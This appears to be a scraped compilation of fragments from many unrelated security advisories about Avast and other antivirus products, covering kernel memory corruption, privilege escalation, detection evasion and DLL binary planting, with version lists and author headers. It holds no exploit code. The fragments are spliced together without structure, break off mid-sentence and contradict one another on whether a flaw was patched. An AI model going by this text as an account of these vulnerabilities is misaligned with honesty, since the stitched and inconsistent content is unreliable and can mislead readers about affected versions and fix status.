URL:
http://blog.zoller.lu/2009/04/release-mode-forced-release-vendor-has.html
Update : After the reaction from avast, it is now clear that all versions
and products are affected, however there is no plan to patch, the
patch will come or will not come - sometime in the future.
You are encouraged to read the time line and draw your own conclusions.
ShineShadow Security Report 22102009-12
TITLE
Avast! Multiple Vulnerabilities
BACKGROUND
Avast! antivirus software represents complete virus protection, offering full desktop security including a resident shield. Daily automatic updates ensure continuous data protection against all types of malware and spyware. Avast! antivirus is certified by both ICSA Labs and West Coast Labs Checkmark.
Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.
Abstract:
Some Windows antivirus software fails to detect, block and/or
disinfect/move/delete malware if the malware EXE file has only
execution permission and no read, write or other permissions.
The worst cases are NOD32 and Avast antivirus, which allow the
malware to run unimpeded. Avast has fixed the flaw while NOD32
is still vulnerable as of this writing.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: avast! 4.7 aavmker4.sys Kernel Memory Corruption
Advisory ID: TKADV2008-002
Revision: 1.0
Release Date: 2008/03/30
Last Modified: 2008/03/30
Date Reported: 2008/03/16
Author: Tobias Klein (tk at trapkit.de)
Avast! AntiVirus TAR Processing Remote Heap Corruption
Sowhat of Nevis Labs
http://www.nevisnetworks.com
http://secway.org/advisory/AD20071206.txt
BID: 26702
Vendor:
http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html
=============[Avast aswRdr.sys Kernel Pool Corruption and Local
Privilege Escalation]================
Author(s): Giuseppe 'Evilcry' Bonfa'
AbdulAziz Hariri
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
______________________________________________________________________
From the low-hanging-fruit-department - AVAST bypass/evasion
______________________________________________________________________
Release mode: Forced release, vendor has not replied.
Ref : TZO-092009 - AVAST Generic Evasion
WWW : http://blog.zoller.lu/2009/04/release-mode-forced-release-vendor-has.html
Vendor : http://www.avast.com
Security notification reaction rating : Catastrophic
Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php
-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->
Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM<br>
Website: http://evilcry.netsons.org<br>
http://evilcodecave.blogspot.com<br>
http://evilcodecave.wordpress.com<br>
-----------------------------------------------------------------------
iViZ Techno Solutions Pvt. Ltd.
http://www.ivizsecurity.com
-----------------------------------------------------------------------
* Title: Avast antivirus for Linux multiple vulnerabilities.
* Date: 10/12/2008
* Software: Avast for Workstations v1.0.8
--[ Synopsis:
//----- Advisory
Program : avast! 4.8.1335 Professional
Homepage : http://www.avast.com
Discovery : 2009/07/29
Author Contacted : 2009/07/31
Found by : Heurs
This Advisory : Heurs
Contact : heurs@ghostsinthstack.org, s.leberre@sysdream.com
Impact: Baypassing the Detection of Malicious web page that can compromise a user's system
Vulnerabled AV-Software:
ESET Smart Security Latest Version<=(the Exploit was dedicated for it)
AhnLab-V3 2008.12.4.1
AntiVir 7.9.0.36 2008.12.04
Avast 4.8.1281.0
CAT-QuickHeal 10.00
ClamAV 0.94.1
DrWeb 4.44.0.09170
Ewido 4.0
Ikarus T3.1.1.45.0
* BlackICE
* McAfee
* Pointsec
* ISS Proventia
* ZoneAlarm
* Avast
* AVG
* Trusteer Rapport
Kind regards
The latest security updates from Microsoft fix binary planting issues (loading of
dwmapi.dll) in the following applications (and probably many more):
1. Autodesk 3ds Max 2010 Release 12.0
2. Autodesk 3ds Max 2011 Release 13.0
3. Avast! Free Antivirus 5.0.545
4. Avira Premium Security Suite 10.0.0.542
5. BitDefender Total Security 2010 - Build 13.0.17.343
6. CorelDraw X5 15.1.0.588
7. Corel Paint Shop Pro Photo X3 13.2.0.41
8. CyberLink PowerDirector 8.00.2220
Vulnerable software:
* 3D EQSecure Professional Edition 4.2
* avast! Internet Security 5.0.462
* AVG Internet Security 9.0.791
* Avira Premium Security Suite 10.0.0.536
* BitDefender Total Security 2010 13.0.20.347
* Blink Professional 4.6.1
* CA Internet Security Suite Plus 2010 6.0.0.272
In 2009 we examined the effects of manipulating synchronization
objects in security software suites frequently found on personal
computers running Windows XP and Vista. The synchronization objects
were mutexes and events, and the security software included products
from AVG, Avast, Avira, BitDefender, BullGuard, CheckPoint, Eset,
F-Prot, F-Secure, Kaspersky, McAfee, Microsoft (Security Essentials),
Norman, Norton, Panda, PC Tools, Quick Heal, Symantec, and Trend
Micro.
The examinations revealed that nearly all suites suffered non-trivial
